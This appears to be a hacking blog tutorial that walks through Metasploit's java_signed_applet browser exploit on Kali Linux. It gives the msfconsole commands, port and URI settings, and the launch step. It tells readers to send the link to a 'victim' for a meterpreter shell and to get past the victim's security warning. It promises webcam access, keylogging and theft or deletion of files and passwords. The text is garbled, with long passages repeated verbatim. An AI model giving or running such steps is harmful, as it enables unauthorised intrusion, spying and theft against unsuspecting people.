So As you have heard, about the New version of Backtrack, Dubbed as Kali Linux.
This edition brought many changes in the Backtrack OS.
Now, we start Kali Linux Tutorial, using our favourite tool "Metasploit". we will now create a Java Signed Applet, which will enable us to control the victims PC, use his webcam, see whats on his screen, tap their key strokes and much more.
# Metasploit On it . (tutorial below)
# A Victim using Windows 8.
# Brains And Balls !
KALI Linux And Metasploit :
Kali Linux, This evolved version of our lovely Backtrack, Is a Linux Distro Specially Created for Hackers, By Hackers. You will find 1000+ Tools in it which are capable of SQL Injection, IP Smurfing, IP Scanning, Password Cracking And more. It is based on Debian, Which is known as the most tested and most solid base for any Operating systems. It Has a very big software library and it is pretty easy to Use.
# A Victim using Windows 8.
# Brains And Balls !
KALI Linux And Metasploit :
Kali Linux, This evolved version of our lovely Backtrack, Is a Linux Distro Specially Created for Hackers, By Hackers. You will find 1000+ Tools in it which are capable of SQL Injection, IP Smurfing, IP Scanning, Password Cracking And more. It is based on Debian, Which is known as the most tested and most solid base for any Operating systems. It Has a very big software library and it is pretty easy to Use.
BEST THING :Its Open Source.
Metasploit is a security penetration tool, Based on Metasploit framework. Metasploit was buggy-as-hell in backtrack, but i'm happy to tell you it has completely changed its libraries and is now smooth as silk on Kali.Steps To Perform This Attack :
#1 - Launching Metasploit On Kali Linux :
So I Assume you have Kali Linux running on your PC, doesn't matter if its on a Live CD, USB, Or Installed.
So Now you need to open the terminal and type this :
msfconsole
Give it a sec, and after it has loaded, type (or copy/paste) this command :
use multi/browser/java_signed_applet
It would look something like this picture below :
#2 - Setting Port Numbers :
So you know we need an active port on both victim pc and our computer, so that our computers can talk to each other. In this version, this port is called SRVPORT, and we can set it by :
set SRVPORT [Port number]
it is by default 8080, but i have set it to 1020, you can set it to anything you want.
Now to change the path to the exploit, we can set the URIPATH to anything we want. We can leave all the settings as it is, but it will look a little bit ugly, And ugly is bad for hackers, we want our thing to look like a diamond, so that everybody wants it. So to do it we will type this command now :
set URIPATH /
#3 - Verifying if it is done correctly :
You don't want any errors, trust me, so why don't you look at all the command you have typed.
#4 - Launching the exploit :
After checking everything, we will type this command and this will launch our exploit :
exploit
now all you have to do is send the IP to the victim, and get one click on it, andddddddd..................., you have hacked his PC.
Of-course he will see a warning like this :
but you can get past it, can't you guys .
#5 - Welcome To His System :
Now you have opened a meterpreter to the victims PC, and if you search Google for some powerful commands, you can erase/delete/corrupt/shut down/reboot/steal his files/passwords etc . So use it carefully.
msfconsole
Give it a sec, and after it has loaded, type (or copy/paste) this command :
use multi/browser/java_signed_applet
It would look something like this picture below :
#2 - Setting Port Numbers :
So you know we need an active port on both victim pc and our computer, so that our computers can talk to each other. In this version, this port is called SRVPORT, and we can set it by :
set SRVPORT [Port number]
it is by default 8080, but i have set it to 1020, you can set it to anything you want.
Now to change the path to the exploit, we can set the URIPATH to anything we want. We can leave all the settings as it is, but it will look a little bit ugly, And ugly is bad for hackers, we want our thing to look like a diamond, so that everybody wants it. So to do it we will type this command now :
set URIPATH /
#3 - Verifying if it is done correctly :
You don't want any errors, trust me, so why don't you look at all the command you have typed.
#4 - Launching the exploit :
After checking everything, we will type this command and this will launch our exploit :
exploit
now all you have to do is send the IP to the victim, and get one click on it, andddddddd..................., you have hacked his PC.
Of-course he will see a warning like this :
but you can get past it, can't you guys .
#5 - Welcome To His System :
Now you have opened a meterpreter to the victims PC, and if you search Google for some powerful commands, you can erase/delete/corrupt/shut down/reboot/steal his files/passwords etc . So use it carefully.
Post a Comment